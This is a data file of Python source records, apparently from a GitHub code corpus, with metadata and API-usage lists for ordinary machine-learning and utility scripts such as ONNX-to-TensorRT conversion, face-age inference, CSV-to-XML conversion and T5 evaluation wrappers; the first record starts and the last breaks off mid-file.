compute_indices.append(i)\n for i in tqdm(compute_indices, file=sys.stdout, leave=False, dynamic_ncols=True):\n # Load image, process image, get image regions, feed into the network, get descriptor, and store\n I, R = image_helper.prepare_image_and_grid_regions(dataset.get_filename(i), roi=None)\n features[i] = image_helper.get_rmac_features(I, R, net)\n # Save new matrix if needed\n if compute_indices:\n np.save(out_descr_fname, features)\n features = np.dstack(\n [np.load(\"{0}/descr_S{1}_L{2}.npy\".format(self.temp_dir, S, self.L)) for S in Ss]\n ).sum(axis=2)\n features /= np.sqrt((features * features).sum(axis=1))[:, None]\n # Restore the original scale\n image_helper.S = self.S\n\n # Extract queries and db features in 2 different matrices\n self.features_queries = features[dataset.query_indices, :]\n assert (np.isnan(self.features_queries).any() == False)\n self.features_dataset = [features[dataset.db_indices, :]]\n assert (np.isnan(self.features_dataset).any() == False)\n", "repo_name": "jbboin/panorama-indexing-localization", "sub_path": "evaluate_lib.py", "file_name": "evaluate_lib.py", "file_ext": "py", "file_size_in_byte": 25065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 198, "usage_type": "call"}, {"api_name": "json.load", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 213, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 217, "usage_type": "call"}, {"api_name": "json.load", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 389, "usage_type": "call"}, {"api_name": "json.load", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 441, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 453, "usage_type": "call"}, {"api_name": "os.path", "line_number": 453, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 484, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 499, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 499, "usage_type": "attribute"}, {"api_name": "numpy.all", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 554, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 555, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 559, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 561, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 561, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 569, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 579, "usage_type": "call"}]}
+{"seq_id": "13921550251", "text": "import argparse\nimport logging\n\nfrom mmdeploy.backend.tensorrt import from_onnx\nfrom mmdeploy.backend.tensorrt.utils import get_trt_log_level\nfrom mmdeploy.utils import (get_common_config, get_model_inputs,\n get_root_logger, load_config)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Convert ONNX to TensorRT.')\n parser.add_argument('deploy_cfg', help='deploy config path')\n parser.add_argument('onnx_path', help='ONNX model path')\n parser.add_argument('output_prefix', help='output TensorRT engine prefix')\n parser.add_argument('--device-id', help='`the CUDA device id', default=0)\n parser.add_argument(\n '--calib-file',\n help='`the calibration data used to calibrate engine to int8',\n default=None)\n parser.add_argument(\n '--log-level',\n help='set log level',\n default='INFO',\n choices=list(logging._nameToLevel.keys()))\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n logger = get_root_logger(log_level=args.log_level)\n\n deploy_cfg_path = args.deploy_cfg\n deploy_cfg = load_config(deploy_cfg_path)[0]\n onnx_path = args.onnx_path\n output_prefix = args.output_prefix\n device_id = args.device_id\n calib_file = args.calib_file\n\n model_id = 0\n common_params = get_common_config(deploy_cfg)\n model_params = get_model_inputs(deploy_cfg)[model_id]\n\n final_params = common_params\n final_params.update(model_params)\n\n int8_param = final_params.get('int8_param', dict())\n\n if calib_file is not None:\n int8_param['calib_file'] = calib_file\n # do not support partition model calibration for now\n int8_param['model_type'] = 'end2end'\n\n logger.info(f'onnx2tensorrt: \\n\\tonnx_path: {onnx_path} '\n f'\\n\\tdeploy_cfg: {deploy_cfg_path}')\n from_onnx(\n onnx_path,\n output_prefix,\n input_shapes=final_params['input_shapes'],\n log_level=get_trt_log_level(),\n fp16_mode=final_params.get('fp16_mode', False),\n int8_mode=final_params.get('int8_mode', False),\n int8_param=int8_param,\n max_workspace_size=final_params.get('max_workspace_size', 0),\n device_id=device_id)\n\n logger.info('onnx2tensorrt success.')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "open-mmlab/mmdeploy", "sub_path": "tools/onnx2tensorrt.py", "file_name": "onnx2tensorrt.py", "file_ext": "py", "file_size_in_byte": 2332, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2256, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "logging._nameToLevel.keys", "line_number": 24, "usage_type": "call"}, {"api_name": "logging._nameToLevel", "line_number": 24, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.get_root_logger", "line_number": 32, "usage_type": "call"}, {"api_name": "mmdeploy.utils.load_config", "line_number": 35, "usage_type": "call"}, {"api_name": "mmdeploy.utils.get_common_config", "line_number": 42, "usage_type": "call"}, {"api_name": "mmdeploy.utils.get_model_inputs", "line_number": 43, "usage_type": "call"}, {"api_name": "mmdeploy.backend.tensorrt.from_onnx", "line_number": 57, "usage_type": "call"}, {"api_name": "mmdeploy.backend.tensorrt.utils.get_trt_log_level", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "10545186052", "text": "#! /usr/bin/env python\nimport csv\nimport decimal\nfrom xml.dom.minidom import Document\n\ndata = csv.DictReader (open(\"../data/zips2013.csv\",'U'))\n#Create the XML doc\ndoc = Document()\n#create the base element\ndocbase = doc.createElement(\"docbase\")\ndoc.appendChild(docbase)\n\ndef gapFixer(n):\n if \"NA\" == n:\n return n\n else:\n dec = int(round(decimal.Decimal(n), 2)*100)\n return str(dec)\n\nfor row in data:\n #create the row element\n\tZIP = doc.createElement('ZIP')\n\n\tZIP.setAttribute('COUNTY', row['County'].strip())\n\tZIP.setAttribute('ZIP_CODE', row['ZIP'].strip())\n\tZIP.setAttribute('GAP', gapFixer(row['GAP']))\n\tZIP.setAttribute('PRICE', row['MEDIAN SALE PRICE'])\n\tZIP.setAttribute('SALES', row['1ST QUARTER SALES'])\n\tdocbase.appendChild(ZIP)\n\nf = open('../data/zips2013.xml', 'w')\ndoc.writexml(f, addindent=\" \", newl=\"\\n\")\nf.close()", "repo_name": "ucabgao/IRA4", "sub_path": "emilymerwin/PropertyTax/py/proptaxCSVtoXML.py", "file_name": "proptaxCSVtoXML.py", "file_ext": "py", "file_size_in_byte": 858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.DictReader", "line_number": 6, "usage_type": "call"}, {"api_name": "xml.dom.minidom.Document", "line_number": 8, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "4614820064", "text": "from IPython import display\nimport pydotplus\nimport matplotlib as plt\n\ndef draw_graph(spec):\n return display.Image(pydotplus.graphviz.graph_from_dot_data(spec).create_png())\n\n\ndef draw_example_1():\n return draw_graph(\"\"\"\n digraph G {\n\n rankdir=LR\n splines=line\n\n node [fixedsize=true];\n\n subgraph cluster_0 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=blue4, shape=circle];\n \t\tx1 x2 x3;\n \t\tlabel = \"layer 1 (Input layer)\";\n \t}\n\n \tsubgraph cluster_1 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=red2, shape=circle];\n \t\th1 h2;\n \t\tlabel = \"layer 2 (hidden layer)\";\n \t}\n\n \tsubgraph cluster_2 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=seagreen2, shape=circle];\n \t\tyhat;\n \t\tlabel=\"layer 3 (output layer)\";\n \t}\n\n x2 -> h1;\n x3 -> h1;\n x1 -> h1;\n x3 -> h2;\n x2 -> h2;\n x1 -> h2;\n\n h1 -> yhat\n h2 -> yhat\n\n }\n \"\"\")\n\n\ndef draw_neural_net(ax, left, right, bottom, top, layer_sizes):\n '''\n Draw a neural network cartoon using matplotilb.\n\n :usage:\n >>> fig = plt.figure(figsize=(12, 12))\n >>> draw_neural_net(fig.gca(), .1, .9, .1, .9, [4, 7, 2])\n\n :parameters:\n - ax : matplotlib.axes.AxesSubplot\n The axes on which to plot the cartoon (get e.g. by plt.gca())\n - left : float\n The center of the leftmost node(s) will be placed here\n - right : float\n The center of the rightmost node(s) will be placed here\n - bottom : float\n The center of the bottommost node(s) will be placed here\n - top : float\n The center of the topmost node(s) will be placed here\n - layer_sizes : list of int\n List of layer sizes, including input and output dimensionality\n '''\n n_layers = len(layer_sizes)\n v_spacing = (top - bottom)/float(max(layer_sizes))\n h_spacing = (right - left)/float(len(layer_sizes) - 1)\n # Nodes\n for n, layer_size in enumerate(layer_sizes):\n layer_top = v_spacing*(layer_size - 1)/2. + (top + bottom)/2.\n for m in range(layer_size):\n circle = plt.Circle((n*h_spacing + left, layer_top - m*v_spacing), v_spacing/4.,\n color='w', ec='k', zorder=4)\n ax.add_artist(circle)\n # Edges\n for n, (layer_size_a, layer_size_b) in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):\n layer_top_a = v_spacing*(layer_size_a - 1)/2. + (top + bottom)/2.\n layer_top_b = v_spacing*(layer_size_b - 1)/2. + (top + bottom)/2.\n for m in range(layer_size_a):\n for o in range(layer_size_b):\n line = plt.Line2D([n*h_spacing + left, (n + 1)*h_spacing + left],\n [layer_top_a - m*v_spacing, layer_top_b - o*v_spacing], c='k')\n ax.add_artist(line)\n", "repo_name": "bryantravissmith/first-neural-network", "sub_path": "diagrams/draw_network.py", "file_name": "draw_network.py", "file_ext": "py", "file_size_in_byte": 2927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "IPython.display.Image", "line_number": 6, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 6, "usage_type": "name"}, {"api_name": "pydotplus.graphviz.graph_from_dot_data", "line_number": 6, "usage_type": "call"}, {"api_name": "pydotplus.graphviz", "line_number": 6, "usage_type": "attribute"}, {"api_name": "matplotlib.Circle", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.Line2D", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "30324554307", "text": "import argparse\nimport time\nimport torch\nimport cv2\nimport numpy as np\nfrom torchvision import transforms\nfrom align_image import align\nimport model\nfrom PIL import Image\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--device\", type=str, default='cpu')\nparser.add_argument(\"--image\", type=str, default='tests/test2.jpg')\nparser.add_argument(\"--kind\", type=str, default='image', help=\"image or camera?\")\nargs = parser.parse_args()\n\n\ntransform = transforms.Compose([\n # transforms.PILToTensor(),\n transforms.Resize((160,160)),\n # transforms.RandomRotation(10),\n transforms.ToTensor(),\n # torchvision.transforms.Normalize((0), (1))\n])\n\n\ndevice=args.device\nm=model.Model()\nm.load_state_dict(torch.load('weight.pth',map_location=args.device))\nm.eval()\n\ndef pred(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n face = align(img)\n if np.all(face != None):\n img=cv2.resize(face,(160,160))\n img = Image.fromarray(img)\n tensor=transform(img).unsqueeze(0)\n tensor=tensor.to(device)\n start=time.time()\n pred=m(tensor)\n print(f\"{time.time()-start} sec\")\n pred=pred.cpu().detach().numpy()\n return pred\n else:\n return -1\n\n\n\n\nif args.kind ==\"camera\":\n cap=cv2.VideoCapture(0)\n while True:\n valid, frame = cap.read()\n if valid is not True:\n break\n\n row, col, ch = frame.shape\n mask = frame[row //2-100:row // 2+100, col // 2-100:col // 2+100]\n frame=cv2.medianBlur(frame,33)\n frame[0:row]=(255,0,0)\n frame[row // 2-100:row // 2+100, col // 2-100:col // 2+100] = mask\n y_pr=pred(mask)\n frame=cv2.putText(frame,str(y_pr), (50,50), cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255), 3, 2)\n cv2.imshow('',frame)\n cv2.waitKey(1)\n\nelse:\n img=cv2.imread(args.image)\n o=pred(img)\n print(o)\n\n\n\n\n\n", "repo_name": "FatemeZamanian/DeepLearning", "sub_path": "Face Age RegressionTorch/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 34, "usage_type": "attribute"}, {"api_name": "align_image.align", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "time.time", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "8025761577", "text": "from sqlalchemy import Column, String, Integer, Date, Numeric, ForeignKey\nfrom base import Base\n\n\nclass Product(Base):\n __tablename__ = 'products'\n\n id = Column(Integer, primary_key=True)\n name = Column('name', String)\n code = Column('code', Integer)\n price = Column('price', Numeric)\n vendor_id = Column(Integer, ForeignKey('vendors.id'))\n\n def __init__(self, name, code, vendor_id, price=None):\n self.name = name\n self.code = code\n self.vendor_id = vendor_id\n if not price:\n self.price = None\n else:\n self.price = price\n\n def to__dict__(self):\n d = dict()\n d['id'] = self.id\n d['name'] = self.name\n d['code'] = self.code\n d['vendor_id'] = self.vendor_id\n if self.price:\n d['price'] = str(self.price)\n else:\n d['price'] = None\n return d\n", "repo_name": "barussa/bradoo", "sub_path": "model/products.py", "file_name": "products.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Base", "line_number": 5, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 8, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 9, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 10, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 12, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "23318691344", "text": "import typing\n\nfrom rgb_to_acnh import convert as _convert\n\n\ndef convert(hex: int) -> typing.Tuple[int, int, int]:\n \"\"\"Converts a 24-bit RGB hex colour to ACNH HSV\"\"\"\n return _convert((hex & 0xFF0000) >> 16, (hex & 0xFF00) >> 8, hex & 0xFF)\n\n\nif __name__ == \"__main__\":\n import sys\n from acnh_constants import hue_width, sat_width, val_width\n\n hue_slider_scale = 1\n sat_slider_scale = 1\n val_slider_scale = 1\n\n if len(sys.argv) == 1:\n hex = int(input(\"hex: \"), base=16)\n ext = \"\"\n elif len(sys.argv) >= 2:\n hex = int(sys.argv[1], base=16)\n ext = \" \".join(sys.argv[2:])\n else:\n print(\n \"Invalid number of parameters. Usage: {} [ [comment]]\".format(\n sys.argv[0]\n )\n )\n exit(1)\n\n nh, ns, nv = convert(hex)\n hue_slider = [\"░\" for i in range(hue_width)]\n hue_slider[nh] = \"█\"\n sat_slider = [\"[]\" for i in range(sat_width)]\n sat_slider[ns] = \"██\"\n val_slider = [\"[]\" for i in range(val_width)]\n val_slider[nv] = \"██\"\n\n print(\"ACNH colour is:\", ext)\n print(\n \"\".join(i * hue_slider_scale for i in hue_slider),\n f\"({nh:02} -> | <- {29-nh:02})\",\n )\n print(\n \"\".join(i * sat_slider_scale for i in sat_slider),\n f\"({ns:02} -> | <- {14-ns:02})\",\n )\n print(\n \"\".join(i * val_slider_scale for i in val_slider),\n f\"({nv:02} -> | <- {14-nv:02})\",\n )\n", "repo_name": "Starwort/dot-matrix-pattern", "sub_path": "hex_to_acnh.py", "file_name": "hex_to_acnh.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rgb_to_acnh.convert", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "acnh_constants.hue_width", "line_number": 34, "usage_type": "argument"}, {"api_name": "acnh_constants.sat_width", "line_number": 36, "usage_type": "argument"}, {"api_name": "acnh_constants.val_width", "line_number": 38, "usage_type": "argument"}]}
+{"seq_id": "37697696354", "text": "from abc import ABC\nfrom typing import Any, Dict, Iterator, Optional, Sequence\n\nimport more_itertools\nimport torch\nfrom tango.common import Tqdm\nfrom tango.common.sequences import MappedSequence\nfrom transformers import (\n AutoModelForSeq2SeqLM,\n AutoTokenizer,\n T5ForConditionalGeneration,\n T5TokenizerFast,\n)\n\nfrom catwalk import cached_transformers\nfrom catwalk.model import Model, UnsupportedTaskError\nfrom catwalk.task import InstanceFormat, Task\n\n_true_tensor = torch.tensor([True])\n_false_tensor = torch.tensor([False])\n\n\nclass T5Model(Model, ABC):\n def get_model(self) -> T5ForConditionalGeneration:\n raise NotImplementedError\n\n def get_tokenizer(self) -> T5TokenizerFast:\n raise NotImplementedError\n\n def _predict_qa(\n self, task: Task, instances: Sequence[Dict[str, Any]], batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n qas = MappedSequence(task.instance_conversions[InstanceFormat.HF_QA], instances)\n\n model = self.get_model().eval()\n tokenizer = self.get_tokenizer()\n tokenizer.model_max_length = model.config.n_positions\n\n with torch.inference_mode():\n with Tqdm.tqdm(qas, desc=\"Processing instances\") as qas_tqdm:\n for batch in more_itertools.chunked(qas_tqdm, batch_size):\n model_input = tokenizer(\n [f\"question:{i.question}\" for i in batch],\n [f\"context:{i.context}\" for i in batch],\n truncation=\"only_second\",\n padding=\"longest\",\n return_tensors=\"pt\",\n )\n\n model_output = model.generate(\n **model_input, max_new_tokens=50\n ) # 50 new tokens is also same as GPT evaluation\n model_output = tokenizer.batch_decode(\n model_output,\n clean_up_tokenization_spaces=True,\n skip_special_tokens=True,\n )\n for instance, prediction in zip(batch, model_output):\n yield {\n \"squad_metrics\": (\n {\"id\": instance.id, \"prediction_text\": prediction},\n {\"id\": instance.id, \"answers\": instance.answers},\n )\n }\n\n def _predict_prompt(\n self, task: Task, instances: Sequence[Dict[str, Any]], batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n prompts = MappedSequence(\n task.instance_conversions[InstanceFormat.T5_PROMPT], instances\n )\n\n model = self.get_model().eval()\n tokenizer = self.get_tokenizer()\n\n with torch.inference_mode():\n with Tqdm.tqdm(prompts, desc=\"Processing instances\") as prompts_tqdm:\n for batch in more_itertools.chunked(prompts_tqdm, batch_size):\n model_input = tokenizer(\n [i[0] for i in batch],\n padding=True,\n truncation=\"only_first\",\n return_tensors=\"pt\",\n pad_to_multiple_of=8,\n )\n model_output = model.generate(**model_input)\n model_output = tokenizer.batch_decode(\n model_output,\n clean_up_tokenization_spaces=True,\n skip_special_tokens=True,\n )\n for target, prediction in zip(batch, model_output):\n target = target[1]\n yield {\n \"acc\": (torch.Tensor([target == prediction]), _true_tensor),\n \"bleu\": ([prediction], [[target]]),\n \"rouge\": ([prediction], [[target]]),\n }\n\n def predict( # type: ignore\n self, task: Task, instances: Sequence[Dict[str, Any]], *, batch_size: int = 32\n ) -> Iterator[Dict[str, Any]]:\n if task.has_instance_conversion(InstanceFormat.T5_PROMPT):\n return self._predict_prompt(task, instances, batch_size=batch_size)\n elif task.has_instance_conversion(InstanceFormat.HF_QA):\n return self._predict_qa(task, instances, batch_size=batch_size)\n\n raise UnsupportedTaskError(self, task)\n\n\n@Model.register(\"catwalk::t5_from_pretrained\")\nclass T5ModelFromPretrained(T5Model):\n def __init__(self, pretrained_model_name_or_path: str):\n self.pretrained_model_name_or_path = pretrained_model_name_or_path\n\n def get_model(self) -> T5ForConditionalGeneration:\n return cached_transformers.get(\n AutoModelForSeq2SeqLM, self.pretrained_model_name_or_path, False\n )\n\n def get_tokenizer(self) -> T5TokenizerFast:\n return cached_transformers.get_tokenizer(\n T5TokenizerFast, self.pretrained_model_name_or_path\n )\n\n\n@Model.register(\"catwalk::t5_from_model\")\nclass T5ModelFromModel(T5Model):\n def __init__(\n self,\n model: T5ForConditionalGeneration,\n tokenizer: Optional[T5TokenizerFast] = None,\n ):\n self.model = model\n self.tokenizer = tokenizer\n\n def get_model(self) -> T5ForConditionalGeneration:\n return self.model\n\n def get_tokenizer(self) -> T5TokenizerFast:\n if self.tokenizer is None:\n return cached_transformers.get_tokenizer(\n T5TokenizerFast, self.get_model().name_or_path\n )\n else:\n return self.tokenizer\n", "repo_name": "allenai/catwalk", "sub_path": "catwalk/models/t5.py", "file_name": "t5.py", "file_ext": "py", "file_size_in_byte": 5630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 20, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 23, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 24, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 27, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "tango.common.sequences.MappedSequence", "line_number": 33, "usage_type": "call"}, {"api_name": "catwalk.task.InstanceFormat.HF_QA", "line_number": 33, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.inference_mode", 